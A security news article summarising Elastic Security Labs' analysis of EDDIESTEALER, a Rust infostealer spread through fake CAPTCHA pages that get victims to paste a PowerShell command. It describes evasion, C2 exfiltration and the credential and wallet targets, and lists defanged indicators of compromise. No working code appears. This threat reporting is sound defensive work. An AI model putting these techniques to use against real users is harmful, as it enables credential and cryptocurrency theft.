Security researchers at Elastic Security Labs have identified a sophisticated new Rust-based infostealer, dubbed EDDIESTEALER, deployed through an inventive Fake CAPTCHA social engineering campaign.
This operation leverages adversary-controlled web infrastructure to spread the malware, primarily targeting Windows hosts and focusing on the exfiltration of credentials, browser information, cryptocurrency wallet contents, and other sensitive data.
Technical Overview of the Attack Chain
The campaign’s initial access vector involves the use of compromised websites that serve a highly convincing, React-based fake CAPTCHA mimicking Google’s reCAPTCHA widget.
Fake CAPTCHA GUI
Unsuspecting victims are prompted to “verify you are a human” by following a sequence of clipboard and keyboard actions: the malicious webpage silently uses JavaScript to copy a PowerShell command to the user’s clipboard, instructs them to open the Windows Run dialog (Win + R), paste the content, and execute the command.
This method exploits user trust and browser familiarity, facilitating the stealthy delivery of a malicious JavaScript payload (gverify.js) from an attacker infrastructure (e.g., llll[.]fit).
This loader script then downloads and executes the main Rust infostealer binary, saved under a pseudorandom filename within the user’s Downloads directory.
The primary payload, EDDIESTEALER, employs multiple evasion and obfuscation techniques, complicating both static and dynamic analysis.
EDDIESTEALER’s adoption of Rust reflects a broader trend of threat actors leveraging modern programming languages for increased stealth and analysis resistance.
EDDIESTEALER’s execution chain
Rust’s memory safety guarantees, zero-cost abstractions, and complex compiler optimizations create significant hurdles for malware analysts.
Most revealing strings within the binary are encrypted using custom XOR routines and decrypted only at runtime.
Standard library and API calls are further obfuscated via a custom WinAPI resolver, dynamically loading and resolving imports as needed.
Upon execution, the malware immediately creates a mutex using a decrypted, unique UUID to avoid multiple infections on the same host.
It conducts a quick check for physical memory (above 4GB) to weakly detect sandbox environments, self-deleting if the check fails.
The self-deletion mechanism employs NTFS Alternate Data Streams to bypass file locks, mimicking techniques seen in other modern infostealers like LATRODECTUS.
Command-and-Control
Initial configuration data is stored as encrypted strings in the binary, decoded to build a C2 URI of the form <C2>/<resource_path>/<UUID>.
EDDIESTEALER retrieves an AES-encrypted task list from its C2 server, instructing it on which files to target.
These targets include a broad array of data sources: major browsers (Chrome, Edge, Firefox, Brave), cryptocurrency wallets (e.g., Electrum, Exodus, Coinomi), password managers (Bitwarden, KeePass), FTP clients (FileZilla, FTP Getter), and messaging apps (Telegram Desktop).
For browsers utilizing application-bound encryption, EDDIESTEALER incorporates reimplementations of open-source projects like ChromeKatz in Rust to extract secrets, including launching hidden browser instances to access in-memory decrypted credentials.
According to Elastic Security Labs Report, the malware sequentially sends AES-encrypted, Base64-encoded POST requests back to its C2 server, containing the stolen data per task.
Notably, C2 communications are conducted over HTTP rather than HTTPS, further distinguishing EDDIESTEALER’s traffic patterns.
Newer EDDIESTEALER samples demonstrate expanded system reconnaissance capabilities, such as enumerating running processes, CPU/GPU specifics, and leveraging server-side sandbox checks to thwart automated analysis environments.
Function inlining and heavy string/data obfuscation are increasingly prevalent, exacerbated by Rust’s aggressive compiler optimizations.
Debugging and analysis are further impeded by embedded Rust panic metadata, leaking internal source file paths, offering rare glimpses into the malware authors’ development environment.
The campaign appears to be rapidly evolving, and researchers have uncovered at least 15 unique samples to date, distributed through shifting infrastructure and C2 endpoints.
EDDIESTEALER activity aligns closely with MITRE ATT&CK tactics including Initial Access (phishing/content injection), Execution (user and scripting interpreter), Defense Evasion, Credential Access, Collection, and Exfiltration.
Behavioral detection such as monitoring for suspicious PowerShell execution, unauthorized credential access, and abnormal HTTP POST patterns remains critical.
Indicators of Compromise (IOCs)
| Observable | Type | Name/Description | Reference/Role |
|---|---|---|---|
| 47409e09afa05fcc9c9eff2c08baca3084d923c8d82159005dbae2029e1959d0 | SHA-256 | MvUlUwagHeZd.exe | EDDIESTEALER Payload |
| e8942805238f1ead8304cfdcf3d6076fa0cdf57533a5fae36380074a90d642e4 | SHA-256 | g_verify.js | EDDIESTEALER Loader |
| 45.144.53[.]145 | ipv4-addr | EDDIESTEALER C2 | |
| 84.200.154[.]47 | ipv4-addr | EDDIESTEALER C2 | |
| shiglimugli[.]xyz | domain-name | EDDIESTEALER C2 | |
| xxxivi[.]com | domain-name | C2/Intermediate Infra | |
| llll[.]fit | domain-name | Loader/Intermediate Infra | |
| plasetplastik[.]com | domain-name | Intermediate Infra | |
| militrex[.]wiki | domain-name | Intermediate Infra |
Find this Story Interesting! Follow us on LinkedIn and X to Get More Instant Updates.
